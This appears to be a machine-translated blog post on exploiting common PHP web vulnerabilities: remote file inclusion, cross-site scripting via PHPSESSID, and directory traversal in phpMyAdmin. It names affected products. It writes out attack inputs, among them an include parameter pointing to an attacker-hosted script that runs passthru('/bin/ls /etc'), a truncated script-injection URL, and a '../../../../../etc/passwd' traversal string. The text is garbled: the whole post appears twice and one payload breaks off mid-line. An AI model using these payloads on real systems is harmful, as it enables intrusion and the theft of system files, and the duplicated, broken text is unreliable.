Source: http://xiaomutou./ciker/blog/
From the current network security perspective, the most concerned and exposed WEB page vulnerability that everyone is most concerned about and exposed to should be ASP. In this regard, Xiaozhu is an expert and I have no say. However, in terms of PHP, there are also serious security problems, but there are not many articles in this regard. Here, let’s discuss the related vulnerabilities of PHP page with you.
I have summarized the common PHP vulnerabilities at present, and are roughly divided into the following types: including file vulnerabilities, script command execution vulnerabilities, file leak vulnerabilities, SQL injection vulnerabilities, etc. Of course, as for some common technologies such as COOKIE spoofing, I will not discuss them here, and there are many of these materials on the Internet. So, let’s analyze how to exploit these vulnerabilities one by one!
First, let's discuss the inclusion file vulnerability. This vulnerability should be said to be unique to PHP. This is due to insufficient processing of malicious data provided by externally, which causes remote attackers to exploit these vulnerabilities to execute arbitrary commands on the system with WEB process permissions. Let's take a look at an example: Assume that there is such a code in it:
include($include."/");
?>
In this code, $include is generally a path that has been set, but we can construct a path ourselves to achieve the purpose of the attack. For example, we submit:?include=http://web/, this web is the space we use for attacks, of course, that is, the code we use to attack. We can write code similar to:passthru("/bin/ls /etc"); in this way, we can execute some purposeful attacks. (Note: the web server should not be able to execute php code, otherwise there will be problems. For details, you can see <<How to attack common vulnerabilities in PHP programs>>). In terms of this vulnerability, there are many problems, such as: PayPal Store Front,
HotNews, Mambo Open Source, PhpDig, YABB SE, phpBB, InvisionBoard, SOLMETRA SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, etc.
Next, let's take a look at the script command execution vulnerability. This is due to the lack of sufficient filtering of the URI parameters submitted by the user. Submission of data containing malicious HTML code can trigger a cross-site scripting attack and may obtain sensitive information from the target user. Let's also give an example: the page in PHP Transparent's PHP PHP 4.3.1 below versions lack sufficient filtering for PHPSESSID. We can use such code to achieve the purpose of the attack:
http://web/?PHPSESSID=">In script, we can construct functions to obtain some sensitive information from the user. In terms of this vulnerability, there are relatively fewer ones, in addition to PHP Transparent, there are also: PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, etc.
Then, let's take a look at the file leakage vulnerability. This vulnerability is due to the lack of sufficient filtering of user submission parameters, which can be used by remote attackers to perform directory traversal attacks and obtain some sensitive information. Let's take the recently discovered phpMyAdmin as an example. In phpMyAdmin, the page does not fully filter the 'what' parameter submitted by the user. If a remote attacker submits data containing multiple '../' characters, he can bypass the WEB ROOT limit and use WEB permission to view any file information on the system. For example, type in an address:?what=../../../../../etc/passwd
From the current network security perspective, the most concerned and exposed WEB page vulnerability that everyone is most concerned about and exposed to should be ASP. In this regard, Xiaozhu is an expert and I have no say. However, in terms of PHP, there are also serious security problems, but there are not many articles in this regard. Here, let’s discuss the related vulnerabilities of PHP page with you.
I have summarized the common PHP vulnerabilities at present, and are roughly divided into the following types: including file vulnerabilities, script command execution vulnerabilities, file leak vulnerabilities, SQL injection vulnerabilities, etc. Of course, as for some common technologies such as COOKIE spoofing, I will not discuss them here, and there are many of these materials on the Internet. So, let’s analyze how to exploit these vulnerabilities one by one!
First, let's discuss the inclusion file vulnerability. This vulnerability should be said to be unique to PHP. This is due to insufficient processing of malicious data provided by externally, which causes remote attackers to exploit these vulnerabilities to execute arbitrary commands on the system with WEB process permissions. Let's take a look at an example: Assume that there is such a code in it:
include($include."/");
?>
In this code, $include is generally a path that has been set, but we can construct a path ourselves to achieve the purpose of the attack. For example, we submit:?include=http://web/, this web is the space we use for attacks, of course, that is, the code we use to attack. We can write code similar to:passthru("/bin/ls /etc"); in this way, we can execute some purposeful attacks. (Note: the web server should not be able to execute php code, otherwise there will be problems. For details, you can see <<How to attack common vulnerabilities in PHP programs>>). In terms of this vulnerability, there are many problems, such as: PayPal Store Front,
HotNews, Mambo Open Source, PhpDig, YABB SE, phpBB, InvisionBoard, SOLMETRA SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, etc.
Next, let's take a look at the script command execution vulnerability. This is due to the lack of sufficient filtering of the URI parameters submitted by the user. Submission of data containing malicious HTML code can trigger a cross-site scripting attack and may obtain sensitive information from the target user. Let's also give an example: the page in PHP Transparent's PHP PHP 4.3.1 below versions lack sufficient filtering for PHPSESSID. We can use such code to achieve the purpose of the attack:
http://web/?PHPSESSID=">In script, we can construct functions to obtain some sensitive information from the user. In terms of this vulnerability, there are relatively fewer ones, in addition to PHP Transparent, there are also: PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, etc.
Then, let's take a look at the file leakage vulnerability. This vulnerability is due to the lack of sufficient filtering of user submission parameters, which can be used by remote attackers to perform directory traversal attacks and obtain some sensitive information. Let's take the recently discovered phpMyAdmin as an example. In phpMyAdmin, the page does not fully filter the 'what' parameter submitted by the user. If a remote attacker submits data containing multiple '../' characters, he can bypass the WEB ROOT limit and use WEB permission to view any file information on the system. For example, type in an address:?what=../../../../../etc/passwd